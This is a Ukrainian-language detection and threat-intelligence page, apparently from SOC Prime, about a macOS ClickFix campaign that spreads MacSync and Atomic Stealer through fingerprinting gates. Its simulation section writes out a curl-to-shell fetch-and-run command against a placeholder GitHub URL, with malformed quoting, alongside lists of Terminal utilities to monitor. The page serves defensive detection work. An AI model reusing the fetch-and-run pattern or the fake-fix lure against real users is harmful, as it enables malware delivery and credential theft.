SOC Prime Bias: Високий

10 Aug 2026 16:48 UTC

Кампанія macOS ClickFix розвивається з прихованими воротами для зараження

Author Photo
SOC Prime Team linkedin icon Стежити
Кампанія macOS ClickFix розвивається з прихованими воротами для зараження
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Кампанія macOS ClickFix розповсюджує інформаційні крадії, такі як MacSync і Atomic Stealer (AMOS), через складний серверний шлюз відбитків пальців. Операція використовує алгоритмічно згенеровані домени та відбитки пальців браузера, щоб забезпечити доставку шкідливих файлів лише справжнім користувачам macOS, допомагаючи уникнути автоматизованого аналізу безпеки та веб-пошукових систем. Ця еволюція означає перехід від широкого соціального інжинірингу до дуже цілеспрямованих технік доставки з маскуванням.

Розслідування

Інтелектуальна команда Microsoft відстежила кластер з понад 250 доменів, які мають особливий шаблон назв, щоб виявити кампанію. Розслідування виявило перехід від прямої доставки приманок до дворівневого процесу, що включає легке JavaScript профілювання. Оцінюючи сигнали WebGL, зсуви часових поясів та перевірки проти аналізу, дослідники визначили, як інфраструктура вибірково націлюється на середовища macOS, подаючи добропорядний контент-приманку не відповідним запитам.

Пом’якшення

Організації повинні навчити користувачів, що справжні оновлення програмного забезпечення не вимагають введення команд у Terminal. Команди безпеки повинні стежити за підозрілою активністю в Terminal, що включає утиліти такі як curl, base64, gunzip, або osascript, особливо якщо вони викликані після перегляду веб-сторінок. Посилення захисту навколо даних Keychain та моніторинг несанкціонованого архівування конфіденційних файлів також можуть зменшити вплив успішного компрометації.

Відповідь

При виявленні підозрілих виконань в Terminal або несанкціонованого доступу до сховищ облікових даних відповідачі повинні негайно ізолювати підозрілу macOS-клієнтів. Розслідуйте вихідні з’єднання до доменів з низькою репутацією, особливо звертаючи увагу на /curl/ шаблони запитів. Виявлені шкідливі хост-телих місць повинні бути заблоковані, і нещодавня історія оболонки повинна бути перевірена на наявність закодованого або заплутаного виконання команд.

Послідовність атаки

Виконання симуляції

Передумова: Перевірка телеметрії та базовий передполітний контроль повинні бути успішними.

Обґрунтування: Цей розділ детально описує точне виконання методики противника (TTP), призначеної для виклику правила виявлення. Команди та нарація ПОВИННІ безпосередньо відображати ідентифіковані TTP і мати на меті генерувати ту ж саму телеметрію, очікувану логікою виявлення. Абстрактні або непов’язані приклади приведуть до помилкового діагнозу.

  • Сценарій атаки та команди: Противник ініціює кампанію ClickFix, відображаючи у веб-браузері підроблене повідомлення про помилку, яке вказує користувачеві “Виправити помилку”, вставивши певну команду в Terminal. Мета зловмисника – встановити сталу присутність або завантажити шкідливе програмне забезпечення. Команда використовує curl для завантаження шкідливого AppleScript-файлу з віддаленого сервера та відправляє його в osascript -e для негайного виконання в пам’яті, оминаючи традиційне файлове сканування.

  • Сценарій регресійного тестування:

    # Симуляція ClickFix: Завантаження файлу та виконання через osascript
    # Примітка: Ми використовуємо безпечну команду echo для симуляції віддаленого файлу, щоб уникнути фактичного зараження.
    
    curl -s https://raw.githubusercontent.com/example/payload/main/script.sh | zsh -c 'osascript -e "display dialog "Попередження безпеки: Потрібне оновлення системи""'
    
    # Для забезпечення тригера правила виявлення ми виконуємо точний шаблон:
    osascript -e 'say "Це симульована атака"'
  • Команди очищення:

    # Жодні файли не записуються на диск в цьому конкретному виконанні командного рядка, 
    # але ми забезпечуємо вбивання будь-яких фонових процесів.
    killall osascript || true